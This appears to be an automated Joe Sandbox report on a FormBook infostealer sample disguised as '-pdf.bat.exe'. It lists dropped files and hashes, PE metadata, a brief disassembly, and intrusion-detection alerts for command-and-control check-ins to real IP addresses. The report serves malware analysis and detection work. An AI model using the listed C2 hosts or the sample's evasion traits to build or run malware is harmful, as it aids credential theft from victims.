        C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll | 0% | ReversingLabs | |

        No Antivirus matches
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1525408
Start date and time: 2024-10-04 08:03:30 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 18m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: -pdf.bat.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/7@18/12
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 70%
• Number of executed functions: 42
• Number of non-executed functions: 263
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:06:59 | API Interceptor | 33723492x Sleep call for process: ipconfig.exe modified
                                                                                                                                              Process:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):369765
                                                                                                                                              Entropy (8bit):7.629530970128673
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:0wrXUVnR5dk609ys1b9uKjiYREmJc3SAJDmsfPLpnMADa:R+R5dzWt1biogJD9P9PDa
                                                                                                                                              MD5:A71E9D6209889F11905FA3C40B25B42E
                                                                                                                                              SHA1:91F72EAA951AA2624BE666B602F638B57A7B33D4
                                                                                                                                              SHA-256:546EE04EBF7F2C7B904DDFEB054D8EC27963AF1CBB9CD28503B58ED55206408F
                                                                                                                                              SHA-512:3A7EEAE9B391BBC7F4A4B8B89C46120F5A8FD07A7C58A86A01D0675F0DF9E3AC485896B3232846FFDDB509F1CF1BE04485EC6D01C53F98B1852BC4BB7CB7FB3F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Process:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):415743
                                                                                                                                              Entropy (8bit):1.2524422116890421
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:r1/VRVN7GaY97mbexftA4Z+RRCLDHuPxfARLhzR+9wBhtOxALX5Wa/5X6dJddvt2:LMxA4/Lf6dHgeGxN37ruZwuLi+OLj
                                                                                                                                              MD5:A6B0286190FF25673A5BBCCA3E635E17
                                                                                                                                              SHA1:B50D863E08054654434EEEAD618AE36D66F5AD59
                                                                                                                                              SHA-256:2587546927274A33BE48C542AD1B98E07DF0C2A8503AFBC1F260EBEC1CB13EDE
                                                                                                                                              SHA-512:1F9C0F6CD3BE6F79168BBD9B07931181CAE135D144DA4E569191E42BF66C5AF0BE49C894E1608A4C45C3BE38DFD47EB912CBA4DADB660A688474B1A3F2ACC72E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Process:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):150717
                                                                                                                                              Entropy (8bit):4.6075331250893115
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:vdv//aYeUak0vzEsZibc/ZZ+LLRf2B5s+/yb1fEyHLkyC/DON2DnxX0m:Jhak0rYbgZZQf2g+/k8EYyC/K4DKm
                                                                                                                                              MD5:22303FBB1D25C1B276AE5F8E751FF4B2
                                                                                                                                              SHA1:ABFA7710A6F1956C7FB30DB43CCAD36A7E6D8235
                                                                                                                                              SHA-256:A310FD8300FBD0C22C5D74651FD028DED78518553F90E4AD69731A5CDF51AEC8
                                                                                                                                              SHA-512:12043F6859AADA73C9468A3287437881A765DC6790E7FA496A2FE51679EC636B051C2F366797BFD5C1D06D87686E03F81FDA1F5772B4CFCC240B864F48C41EF7
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Process:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):624
                                                                                                                                              Entropy (8bit):4.25510206166015
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:jXkvaDziGwRUF27KIqXVskejAECJX7lIHLGsvxAtbH1PIwp5Ayq1Bglj4UriJxMJ:jErRUWOjEM7lYLj5AtbB1Bq1U8hJxMJ
                                                                                                                                              MD5:87F4B14CCA6F39D1C934F93B13234749
                                                                                                                                              SHA1:9FCDD0EAD74EE185F49409E0FFE86B1925CC6F77
                                                                                                                                              SHA-256:E619E25D31210DED72B4DBAE631948D4335AEAE318148E864421457EF0F4ACE9
                                                                                                                                              SHA-512:13DB40313FEF1FDEB1D517E0664B7766328DD7DC7244741FF6B6EAE62C6D0BA5EE458E058375C466C9CB6062E0D7DCC3EC3F57310604A7372F79839ACAFE9471
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:dambrttets talentlseres hytteholds indtgtstabets udsondringernes wimp panickiness.perknite equibiradiate silverleaves abolitionising apotheosise serphidae eksempellses rochester fllesfagslreren..forvindet diligence staring anklagerne facades udgrftning klausulelimineringens.synchytrium listiges solsortredens sitarists encyclopedize femogfyrre sphagnummen pervertible pantomorphic polyprotic restress unwesternised udbudsmaterialets..canepin flipperen biogas trenchcoaters populreres abnormalise gult boks fejlsgningernes skakbrikken petromyzon knirkeriers rubiate..digteren adephagia laantagerens mariposite trop octylene,
                                                                                                                                              Process:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):315351
                                                                                                                                              Entropy (8bit):1.2455738850105664
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:kFtpdTjsz/zhmhiCGrJI7rqVQuEB7QCGqvL2f0SQ1E2IC67MpqrchPadg+nlwAGP:mPGDDdQxvn1Xmrizhj8H3hE3MA
                                                                                                                                              MD5:6957AC2FFFF57F658F70A8608C653D42
                                                                                                                                              SHA1:A6764FE4F4FCDD48C73CB23CCCA9CE19E2845935
                                                                                                                                              SHA-256:480D36CF0DE68BEAE5F1ED80A81AEE327BBA323C7B01A478E5D41BF429041F02
                                                                                                                                              SHA-512:0B2575BDBB7DE38A6D5C2D1D5C8641EC7A65F9F05E2DA8CFAD8F09CE47C31EEEA70C891A8A42A4842F27215DEDDB69357DE9293D57C5ECFB19CC6007B1042505
                                                                                                                                              Malicious:false
                                                                                                                                              Process:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              File Type:zlib compressed data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1272828
                                                                                                                                              Entropy (8bit):4.043377195826715
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:Ay/JwrXUVnR5dk609ys1b9uKjiYREmJc3SAJDmsfPLpnMAD7dsXRvK5ZZQuP/koU:i+R5dzWt1biogJD9P9PDKXRv6ZZrbA
                                                                                                                                              MD5:3E1814A5C91824EB4B702D229FF08714
                                                                                                                                              SHA1:D08A72230046914250E0AE12BFFB14B2A2C5EFC9
                                                                                                                                              SHA-256:9D734B1AD91079288EA265D0B6C348D6013147E195D959C0024F2E1EBBD917C5
                                                                                                                                              SHA-512:E9302D9DD84A0F442277D715290D828BDA1871BFFB5834FACE708BE188E2662CE58E0726CDC86ADB2496BACDA31E183BDAF948E94091B0E47DFF13A249C0137D
                                                                                                                                              Malicious:false
                                                                                                                                              Process:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12288
                                                                                                                                              Entropy (8bit):5.9764977667479
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:CVA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:CrR7SrtTv53tdtTgwF4SQbGPX36wJMw
                                                                                                                                              MD5:D968CB2B98B83C03A9F02DD9B8DF97DC
                                                                                                                                              SHA1:D784C9B7A92DCE58A5038BEB62A48FF509E166A0
                                                                                                                                              SHA-256:A4EC98011EF99E595912718C1A1BF1AA67BFC2192575729D42F559D01F67B95C
                                                                                                                                              SHA-512:2EE41DC68F329A1519A8073ECE7D746C9F3BF45D8EF3B915DEB376AF37E26074134AF5F83C8AF0FE0AB227F0D1ACCA9F37E5CA7AE37C46C3BCC0331FE5E2B97E
                                                                                                                                              Malicious:false
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                              Joe Sandbox View:
• Filename: TERMENII CONTRACTULUI (ACORD NOU#U0102 COMAND#U0102)-pdf.bat.exe, Detection: malicious
• Filename: f5#U06f6.vbs, Detection: malicious
• Filename: f5#U06f6.vbs, Detection: malicious
• Filename: Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbs, Detection: malicious
• Filename: Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbs, Detection: malicious
• Filename: ekstre.exe, Detection: malicious
• Filename: Ziraat Bankasi Swift Mesaji.pdf.exe, Detection: malicious
• Filename: ekstre.exe, Detection: malicious
• Filename: Ziraat Bankasi Swift Mesaji.pdf.exe, Detection: malicious
                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                              Entropy (8bit):7.071641371882409
                                                                                                                                              TrID:
                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                              File name:-pdf.bat.exe
                                                                                                                                              File size:920'486 bytes
                                                                                                                                              MD5:2a19eac38990809a62213e2b89be0f60
                                                                                                                                              SHA1:99d231bc3c54c0d29469c97c4987329fd523fe20
                                                                                                                                              SHA256:d322df678d8d8b40b30c463a51395a961b0a703a01523d6def82a4679b5729a6
                                                                                                                                              SHA512:c5691f86d12f6263405d44288f0ca918dccb8ecd131010053cb12b4989587257935fd0f219ae06f36f79a30fba123596569cdcd0c65a342db2d68583f6a56d11
                                                                                                                                              SSDEEP:24576:ZFZsHTO9u9XKhrmooaiw6J/xJ3hLGdftX8P2J8:Z3n9i6BiwW5J3lStMPm8
                                                                                                                                              TLSH:1715BE0BACD0C9EDCA2CB5F2C837C8741D255D6A98B04B5E6974BA807076B97DD0F82D
                                                                                                                                              Icon Hash:070911614d3d3117
                                                                                                                                              Entrypoint:0x403804
                                                                                                                                              Entrypoint Section:.text
                                                                                                                                              Digitally signed:false
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              Subsystem:windows gui
                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                              Time Stamp:0x63A18D2A [Tue Dec 20 10:23:38 2022 UTC]
                                                                                                                                              TLS Callbacks:
                                                                                                                                              CLR (.Net) Version:
                                                                                                                                              OS Version Major:5
                                                                                                                                              OS Version Minor:1
                                                                                                                                              File Version Major:5
                                                                                                                                              File Version Minor:1
                                                                                                                                              Subsystem Version Major:5
                                                                                                                                              Subsystem Version Minor:1
                                                                                                                                              Import Hash:84062c623770f0d888e4ca58451aa7ad
                                                                                                                                              Instruction
                                                                                                                                              sub esp, 000003F0h
                                                                                                                                              push ebx
                                                                                                                                              push ebp
                                                                                                                                              push esi
                                                                                                                                              push edi
                                                                                                                                              xor ebx, ebx
                                                                                                                                              mov edi, 004084F8h
                                                                                                                                              push 00008001h
                                                                                                                                              mov ebp, ebx
                                                                                                                                              mov dword ptr [esp+14h], ebx
                                                                                                                                              call dword ptr [004080B8h]
                                                                                                                                              mov esi, dword ptr [004080A8h]
                                                                                                                                              lea eax, dword ptr [esp+30h]
                                                                                                                                              xorps xmm0, xmm0
                                                                                                                                              mov dword ptr [esp+44h], ebx
                                                                                                                                              push eax
                                                                                                                                              movlpd qword ptr [esp+00000148h], xmm0
                                                                                                                                              mov dword ptr [esp+34h], 0000011Ch
                                                                                                                                              call esi
                                                                                                                                              test eax, eax
                                                                                                                                              jne 00007F3718B637F9h
                                                                                                                                              lea eax, dword ptr [esp+30h]
                                                                                                                                              mov dword ptr [esp+30h], 00000114h
                                                                                                                                              push eax
                                                                                                                                              call esi
                                                                                                                                              push 00000053h
                                                                                                                                              pop eax
                                                                                                                                              mov dl, 04h
                                                                                                                                              mov byte ptr [esp+0000014Ah], dl
                                                                                                                                              cmp word ptr [esp+44h], ax
                                                                                                                                              jne 00007F3718B637D3h
                                                                                                                                              mov eax, dword ptr [esp+5Eh]
                                                                                                                                              add eax, FFFFFFD0h
                                                                                                                                              mov word ptr [esp+00000144h], ax
                                                                                                                                              jmp 00007F3718B637CDh
                                                                                                                                              xor eax, eax
                                                                                                                                              jmp 00007F3718B637B4h
                                                                                                                                              mov dl, byte ptr [esp+0000014Ah]
                                                                                                                                              cmp dword ptr [esp+34h], 0Ah
                                                                                                                                              jnc 00007F3718B637CDh
                                                                                                                                              movzx eax, word ptr [esp+3Ch]
                                                                                                                                              mov dword ptr [esp+3Ch], eax
                                                                                                                                              jmp 00007F3718B637C6h
                                                                                                                                              mov eax, dword ptr [esp+3Ch]
                                                                                                                                              mov dword ptr [00429E38h], eax
                                                                                                                                              movzx eax, byte ptr [esp+34h]
                                                                                                                                              shl ax, 0008h
                                                                                                                                              movzx ecx, ax
                                                                                                                                              movzx eax, byte ptr [esp+38h]
                                                                                                                                              or ecx, eax
                                                                                                                                              movzx eax, byte ptr [esp+00000144h]
                                                                                                                                              shl ax, 0008h
                                                                                                                                              shl ecx, 10h
                                                                                                                                              movzx eax, word ptr [eax]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8a20 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4e000 | 0x5b2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6dab | 0x6e00 | 1138756712947cfad0fec340a9f6322a | False | 0.6540127840909091 | data | 6.396661733193989 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1894 | 0x1a00 | f104cfd27821b85fded983903a163042 | False | 0.4299879807692308 | data | 4.867236374474069 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x1fe40 | 0x200 | 9a0317be14b12529a14c33f8334a2225 | False | 0.2265625 | data | 1.7566060613591612 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x24000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4e000 | 0x5b2b0 | 0x5b400 | 43b3182ad5c6e9878a85fabd0388831e | False | 0.3067208904109589 | data | 4.845999503948363 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4e2f8 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.28078305766784034
RT_ICON | 0x90320 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.3406926534958003
RT_ICON | 0xa0b48 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.42973547472838924
RT_ICON | 0xa4d70 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.46763485477178424
RT_ICON | 0xa7318 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5314258911819888
RT_ICON | 0xa83c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.650709219858156
RT_DIALOG | 0xa8828 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0xa8928 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0xa8a48 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0xa8b10 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xa8b70 | 0x5a | data | English | United States | 0.7555555555555555
RT_VERSION | 0xa8bd0 | 0x2b0 | data | English | United States | 0.4883720930232558
RT_MANIFEST | 0xa8e80 | 0x42e | XML 1.0 document, ASCII text, with very long lines (1070), with no line terminators | English | United States | 0.5149532710280373
DLL | Import
ADVAPI32.dll | RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll | SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteExW
ole32.dll | OleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | PeekMessageW, DispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, SetDlgItemTextW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, GetDlgItemTextW, CharNextA, CharPrevW, RegisterClassW, MessageBoxIndirectW, LoadCursorW
GDI32.dll | SetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
KERNEL32.dll | GetLastError, WaitForSingleObject, GetExitCodeProcess, RemoveDirectoryW, GetTempFileNameW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, SetErrorMode, CreateProcessW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, CreateFileW, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, WriteFile, MoveFileExW, GetSystemDirectoryW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, GetTempPathW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-04T08:05:31.316838+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49740 | 84.32.84.32 | 80 | TCP
2024-10-04T08:05:31.316838+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49800 | 84.32.84.32 | 80 | TCP
2024-10-04T08:05:31.316838+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49802 | 84.32.84.32 | 80 | TCP
2024-10-04T08:05:31.316838+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49801 | 84.32.84.32 | 80 | TCP
2024-10-04T08:05:31.316838+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49742 | 84.32.84.32 | 80 | TCP
2024-10-04T08:05:31.316838+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49790 | 13.248.169.48 | 80 | TCP
2024-10-04T08:05:31.316838+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49741 | 84.32.84.32 | 80 | TCP
2024-10-04T08:06:04.714237+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49727 | 185.86.211.136 | 80 | TCP
2024-10-04T08:07:04.025801+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49731 | 13.248.169.48 | 80 | TCP
2024-10-04T08:07:04.025801+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49731 | 13.248.169.48 | 80 | TCP
2024-10-04T08:07:20.383566+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49732 | 3.33.130.190 | 80 | TCP
2024-10-04T08:07:22.100362+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49733 | 3.33.130.190 | 80 | TCP
2024-10-04T08:07:24.735595+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49734 | 3.33.130.190 | 80 | TCP
2024-10-04T08:07:27.377023+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49735 | 3.33.130.190 | 80 | TCP
2024-10-04T08:07:27.377023+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49735 | 3.33.130.190 | 80 | TCP
2024-10-04T08:07:32.714938+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49736 | 3.33.130.190 | 80 | TCP
2024-10-04T08:07:36.756611+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49737 | 3.33.130.190 | 80 | TCP
2024-10-04T08:07:38.893739+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49738 | 3.33.130.190 | 80 | TCP
2024-10-04T08:07:40.630217+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49739 | 3.33.130.190 | 80 | TCP
2024-10-04T08:07:40.630217+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49739 | 3.33.130.190 | 80 | TCP
2024-10-04T08:07:53.960838+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49743 | 84.32.84.32 | 80 | TCP
2024-10-04T08:07:53.960838+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49743 | 84.32.84.32 | 80 | TCP
2024-10-04T08:07:59.544844+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49744 | 54.67.87.110 | 80 | TCP
2024-10-04T08:08:02.225108+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49745 | 54.67.87.110 | 80 | TCP
2024-10-04T08:08:04.912589+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49746 | 54.67.87.110 | 80 | TCP
2024-10-04T08:08:07.604179+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49747 | 54.67.87.110 | 80 | TCP
2024-10-04T08:08:07.604179+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49747 | 54.67.87.110 | 80 | TCP
2024-10-04T08:08:13.451544+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49748 | 194.58.112.174 | 80 | TCP
2024-10-04T08:08:16.370453+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49749 | 194.58.112.174 | 80 | TCP
2024-10-04T08:08:19.055237+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49750 | 194.58.112.174 | 80 | TCP
2024-10-04T08:08:21.799799+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49751 | 194.58.112.174 | 80 | TCP
2024-10-04T08:08:21.799799+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49751 | 194.58.112.174 | 80 | TCP
2024-10-04T08:08:27.522500+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49752 | 38.47.207.146 | 80 | TCP
2024-10-04T08:08:30.383804+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49753 | 38.47.207.146 | 80 | TCP
2024-10-04T08:08:33.206347+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49754 | 38.47.207.146 | 80 | TCP
2024-10-04T08:08:36.134022+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49755 | 38.47.207.146 | 80 | TCP
2024-10-04T08:08:36.134022+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.11.20 | 49755 | 38.47.207.146 | 80 | TCP
2024-10-04T08:08:42.464192+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.11.20 | 49756 | 3.33.130.190 | 80 | TCP
                                                                                                                                              2024-10-04T08:08:44.171973+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497573.33.130.19080TCP
                                                                                                                                              2024-10-04T08:08:48.225224+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497583.33.130.19080TCP
                                                                                                                                              2024-10-04T08:08:49.455131+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497593.33.130.19080TCP
                                                                                                                                              2024-10-04T08:08:49.455131+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497593.33.130.19080TCP
                                                                                                                                              2024-10-04T08:08:54.961293+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049760162.213.249.21680TCP
